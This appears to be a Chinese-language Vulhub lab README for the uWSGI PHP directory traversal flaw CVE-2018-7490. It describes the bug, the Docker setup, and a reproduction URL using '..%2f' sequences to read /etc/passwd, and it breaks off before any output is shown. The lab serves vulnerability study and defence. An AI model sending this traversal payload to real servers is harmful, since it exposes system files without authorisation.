aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
63285f61aaf4501a6660be7dfe98c70135c1b89b
vulhub/uwsgi/CVE-2018-7490/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details
first commit
2025-09-06 16:08:15 +08:00

686 B
Raw Blame History

uWSGI PHP目录穿越漏洞CVE-2018-7490

uWSGI是一款Web应用程序服务器它实现了WSGI、uwsgi和http等协议并支持通过插件来运行各种语言。

uWSGI 2.0.17之前的PHP插件没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过..%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件。

漏洞环境

运行存在漏洞的uWSGI服务器

docker compose up -d

运行完成后,访问http://your-ip:8080/即可看到phpinfo信息说明uwsgi-php服务器已成功运行。

漏洞复现

访问http://your-ip:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd,成功读取文件: